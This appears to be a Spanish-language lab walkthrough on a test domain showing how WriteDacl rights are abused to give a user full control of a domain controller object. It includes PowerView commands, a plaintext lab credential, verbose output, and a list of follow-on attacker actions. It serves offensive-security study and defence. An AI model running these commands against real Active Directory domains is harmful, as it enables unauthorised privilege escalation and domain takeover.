WriteDacl sobre Computador
Primero vamos a impersonar el usuario writedacldc.user
desde el equipo llamado USER-SERVER
:

PS C:\Users\admin\Desktop> Import-Module .\PowerView-3.0.ps1
PS C:\Users\admin\Desktop> $SecPassword = ConvertTo-SecureString 'Password@1' -AsPlainText -Force
PS C:\Users\admin\Desktop> $Cred = New-Object System.Management.Automation.PSCredential('spartancybersec.corp\writedacldc.user', $SecPassword)
Despues de lo anterior, vamos a utilizar el siguiente comando para asignar todos los privilegios sobre el usuario user.hacked
desde la sesion previa de writedacldc.user
PS C:\Users\admin\Desktop> Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'CN=FIRST-DC,OU=Domain Controllers,DC=spartancybersec,DC=corp' -PrincipalIdentity user.hacked -Rights All -Verbose
VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'spartancybersec.corp' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://First-DC.spartancybersec.corp/DC=spartancybersec,DC=corp
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=user.hacked)(name=user.hacked)(dnshostname=user.hacked))))
VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'spartancybersec.corp' from -Credential
VERBOSE: [Get-DomainSearcher] search base: LDAP://First-DC.spartancybersec.corp/DC=spartancybersec,DC=corp
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Extracted domain 'spartancybersec.corp' from 'CN=FIRST-DC,OU=Domain Controllers,DC=spartancybersec,DC=corp'
VERBOSE: [Get-DomainSearcher] search base: LDAP://FIRST-DC.SPARTANCYBERSEC.CORP/DC=spartancybersec,DC=corp
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(distinguishedname=CN=FIRST-DC,OU=Domain Controllers,DC=spartancybersec,DC=corp)))
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=User Hacked,CN=Users,DC=spartancybersec,DC=corp 'All' on CN=FIRST-DC,OU=Domain Controllers,DC=spartancybersec,DC=corp
VERBOSE: [Add-DomainObjectAcl] Granting principal CN=User Hacked,CN=Users,DC=spartancybersec,DC=corp rights GUID '00000000-0000-0000-0000-000000000000' on CN=FIRST-DC,OU=Domain
Controllers,DC=spartancybersec,DC=corp
Lo anterior, se puede apreciar graficamente con la siguiente ilustracion:

En resumen, el comando está otorgando permisos amplios al usuario user.hacked
en un objeto específico de Controlador de Dominio en el dominio de Active Directory spartancybersec.corp
, utilizando credenciales alternas proporcionadas.
Con los permisos 'All' otorgados al usuario user.hacked
en un objeto específico del Controlador de Dominio en Active Directory, el usuario podría realizar una amplia gama de acciones, incluyendo:
Modificar Configuraciones del Controlador de Dominio: Cambiar configuraciones críticas del Controlador de Dominio.
Modificar Políticas de Grupo: Cambiar políticas que afectan a todos los usuarios y computadoras del dominio.
Acceder a Datos Sensibles: Leer información sensible almacenada en el Controlador de Dominio.
Crear o Eliminar Cuentas de Usuario: Potencialmente crear cuentas de administrador o eliminar cuentas existentes.
Cambiar Permisos y Derechos de Otros Usuarios: Modificar los derechos de acceso de otros usuarios en el dominio.
Para este escenario, seria necesario continuarlo con el ataque RBCD.
Última actualización
¿Te fue útil?